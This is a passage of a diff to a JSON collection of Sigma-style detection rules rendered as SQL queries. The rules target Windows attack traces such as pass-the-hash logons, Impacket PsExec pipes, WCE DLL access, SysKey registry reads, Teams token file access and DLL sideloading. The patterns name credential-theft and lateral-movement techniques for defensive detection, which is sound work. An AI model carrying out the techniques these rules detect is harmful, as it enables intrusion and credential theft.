'\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" ], - "filename": "file_event_win_office_winword_startup.yml" + "filename": "win_security_pass_the_hash_2.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "User Logoff Event", + "id": "0badd08f-c6a3-4630-90d3-6875cca440be", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4634', '4647'))" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_user_logoff.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "Windows Pcap Drivers", + "id": "7b687634-ab20-11ea-bb37-0242ac130002", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "author": "Cian Heasley", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_pcap_drivers.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Login with WMI", + "id": "5af54681-df95-4c26-854f-2565e13cfab0", + "status": "stable", + "description": "Detection of logins performed with WMI", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "Monitoring tools", + "Legitimate system administration" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND ProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_susp_wmi_login.yml" }, { - "title": "Office Macro File Download", - "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "author": "frack113", "falsepositives": [ - "Legitimate macro files downloaded from the internet", - "Legitimate macro files sent as attachemnts via emails" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\HxOutlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_office_macro_files_downloaded.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "status": "test", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", + "title": "User with Privileges Logon", + "id": "94309181-d345-4cbf-b5fe-061769bdf9cb", "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "author": "frack113", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4672', '4964') AND NOT (SubjectUserSid = 'S-1-5-18'))" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_admin_logon.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", - "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.credential_access", + "attack.t1003", + "attack.s0005" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.privilege_escalation" + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "TeamViewer Remote Session", - "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", - "status": "test", - "description": "Detects the creation of log files during a TeamViewer remote session", + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "status": "experimental", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Legitimate uses of TeamViewer in an organisation" + "User using a disabled account" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml" + "filename": "win_security_susp_failed_logon_reasons.yml" }, { - "title": "Creation Of Non-Existent System DLL", - "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", + "attack.execution", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE 